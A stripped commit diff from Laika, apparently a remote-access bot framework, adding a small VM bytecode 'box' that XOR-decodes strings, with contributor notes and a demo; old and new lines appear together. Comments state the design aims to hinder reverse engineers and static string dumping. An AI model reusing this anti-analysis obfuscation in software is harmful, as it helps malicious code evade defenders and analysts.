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Box: added LAIKA_BOX_SKID, vmTest now uses the LAIKA_BOX_SKID box
- updated CONTRIB
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@ -15,6 +15,7 @@ Looking for some simple tasks that need to get done for that sweet 'contributor'
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- Change `lib/lin/linshell.c` to use openpty() instead of forkpty() for BSD support
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- Fix address sanitizer for CMake DEBUG builds
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- Change laikaT_getTime in `lib/src/ltask.c` to not use C11 features.
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- Implement more LAIKA_BOX_* VMs in `lib/include/lbox.h`
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## Lib: Error Handling
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Error handling in Laika is done via the 'lerror.h' header library. It's a small and simple error handling solution written for laika, however can be stripped and used as a simple error handling library. Error handling in Laika is used similarly to other languages, implementing a try & catch block and is achieved using setjmp(). The LAIKA_ERROR(...) is used to throw errors.
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@ -44,6 +45,9 @@ Laika has a simple binary protocol & a small backend (see `lib/src/lpeer.c`) to
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## Lib: Task Service
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Tasks can be scheduled on a delta-period (call X function every approximate N seconds). laikaT_pollTasks() is used to check & run any currently queued tasks. This is useful for sending keep-alive packets, polling shell pipes, or other repeatably scheduled tasks. Most laikaT_pollTasks() calls are done in the peerHandler for each client/server.
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## Lib: VM Boxes
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Laika has a tiny VM for decrypting sensitive information (currently unused, but functional). For details on the ISA read `lib/include/lvm.h`, for information on how to use them read `lib/include/lbox.h`. Feel free to write your own boxes and contribute them :D
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## Bot: Platform-specific backends
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`bot/win` and `bot/lin` include code for platform-specific code that can't be quickly "ifdef"d away. These mainly include stuff like persistence or opening pseudo-ttys.
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@ -18,7 +18,7 @@
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2 main APIs are exposed here, laikaB_unlock() & laikaB_lock(). Both of which are inlined to make it more painful
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for the reverse engineer to quickly dump boxes from memory, forcing them to set breakpoints across the executable.
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Each box has its own VM, with it's own deobfuscation routine. This makes static analysis a painful route for string
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dumping.
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dumping. Some predefined boxes are made for you to use.
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*/
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struct sLaikaB_box {
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@ -26,6 +26,29 @@ struct sLaikaB_box {
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uint8_t code[LAIKA_VM_CODESIZE];
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};
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/* BOX_SKID decodes null-terminated strings using a provided xor _key. aptly named lol [SEE tools/vmtest/src/main.c] */
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#define LAIKA_BOX_SKID(_key) { \
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.unlockedData = {0}, /* reserved */ \
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.code = { /* stack layout: \
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[0] - unlockedData (ptr) \
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[1] - data (ptr) \
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[2] - key (uint8_t) \
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[3] - working data (uint8_t) \
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*/ \
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LAIKA_MAKE_VM_IAB(OP_LOADCONST, 0, 0), \
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LAIKA_MAKE_VM_IAB(OP_LOADCONST, 1, 1), \
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LAIKA_MAKE_VM_IAB(OP_PUSHLIT, 2, _key), \
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/* LOOP_START */ \
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LAIKA_MAKE_VM_IAB(OP_READ, 3, 1), /* load data into working data */ \
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LAIKA_MAKE_VM_IABC(OP_XOR, 3, 3, 2), /* xor data with key */ \
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LAIKA_MAKE_VM_IAB(OP_WRITE, 0, 3), /* write data to unlockedData */ \
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LAIKA_MAKE_VM_IA(OP_INCPTR, 0), \
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LAIKA_MAKE_VM_IA(OP_INCPTR, 1), \
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LAIKA_MAKE_VM_IAB(OP_TESTJMP, 3, -17), /* exit loop on null terminator */ \
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OP_EXIT \
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} \
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}
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LAIKA_FORCEINLINE void* laikaB_unlock(struct sLaikaB_box *box, void *data) {
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struct sLaikaV_vm vm = {
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/* boxes have 2 reserved constants, [0] for the output, [1] for the input */
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@ -5,39 +5,17 @@
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#include "lbox.h"
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/* VM BOX Demo:
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A secret message has been xor'd, this tiny bytecode chunk decodes 'data' into
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'unlockedData'. Obviously you wouldn't want a key this simple, more obfuscation
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would be good (byte swapping, revolving xor key, etc.)
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A secret message has been xor'd, the BOX_SKID is used to decode the message.
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*/
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int main(int argv, char **argc) {
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uint8_t data[] = {
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0x96, 0xBB, 0xB2, 0xB2, 0xB1, 0xFE, 0x89, 0xB1,
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0xAC, 0xB2, 0xBA, 0xFF, 0xDE, 0x20, 0xEA, 0xBA,
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0xAC, 0xB2, 0xBA, 0xFF, 0xDE, 0x20, 0xEA, 0xBA, /* you can see the key here, 0xDE ^ 0xDE is the NULL terminator lol */
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0xCE, 0xEA, 0xFC, 0x01, 0x9C, 0x23, 0x4D, 0xEE
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};
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struct sLaikaB_box box = {
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.unlockedData = {0}, /* reserved */
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.code = { /* stack layout:
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[0] - unlockedData (ptr)
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[1] - data (ptr)
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[2] - key (uint8_t)
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[3] - working data (uint8_t)
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*/
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LAIKA_MAKE_VM_IAB(OP_LOADCONST, 0, 0),
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LAIKA_MAKE_VM_IAB(OP_LOADCONST, 1, 1),
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LAIKA_MAKE_VM_IAB(OP_PUSHLIT, 2, 0xDE),
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/* LOOP_START */
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LAIKA_MAKE_VM_IAB(OP_READ, 3, 1), /* load data into working data */
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LAIKA_MAKE_VM_IABC(OP_XOR, 3, 3, 2), /* xor data with key */
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LAIKA_MAKE_VM_IAB(OP_WRITE, 0, 3), /* write data to unlockedData */
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LAIKA_MAKE_VM_IA(OP_INCPTR, 0),
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LAIKA_MAKE_VM_IA(OP_INCPTR, 1),
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LAIKA_MAKE_VM_IAB(OP_TESTJMP, 3, -17), /* exit loop on null terminator */
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OP_EXIT
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}
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};
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struct sLaikaB_box box = LAIKA_BOX_SKID(0xDE);
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laikaB_unlock(&box, data);
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printf("%s\n", box.unlockedData);
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